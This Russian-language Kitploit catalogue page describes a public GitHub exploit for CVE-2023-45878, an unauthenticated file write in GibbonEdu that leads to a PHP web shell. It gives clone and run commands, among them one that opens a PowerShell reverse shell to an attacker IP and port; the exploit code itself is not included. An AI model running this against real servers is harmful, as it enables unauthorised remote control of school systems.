Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-45878 — GibbonEdu: от произвольной записи файлов к удаленному выполнению кода | Kitploit
Инструменты/GitHubGitHub/davidzzo23/cve-2023-45878
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu: от произвольной записи файлов к удаленному выполнению кода

Репозиторий
321 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-45878

Запись произвольных файлов GibbonEdu с выполнением веб-шелла

Описание

Этот репозиторий содержит эксплойт для CVE-2023-45878 — уязвимости записи произвольных файлов в GibbonEdu. Уязвимость затрагивает конечную точку rubrics_visualise_saveAjax.php и позволяет неаутентифицированному злоумышленнику загружать произвольные файлы на веб-сервер.

Этот скрипт использует уязвимость для загрузки PHP веб-шелла и может либо:

  • Выполнить конкретную системную команду;
  • Запустить обратную оболочку PowerShell, закодированную в base64, для получения удаленного доступа.

Использование

Скрипт поддерживает два режима работы:

  • --command (-c): Выполнить конкретную системную команду удаленно.
  • --shell (-s): Запустить обратную оболочку PowerShell на прослушиватель атакующего.

Как запустить эксплойт

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Запуск эксплойта веб-шелла

  • Выполнение удаленной команды:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
  • Запуск обратной оболочки PowerShell:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Несанкционированное использование этого эксплойта на системах без разрешения незаконно. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим эксплойтом.

Скачать инструмент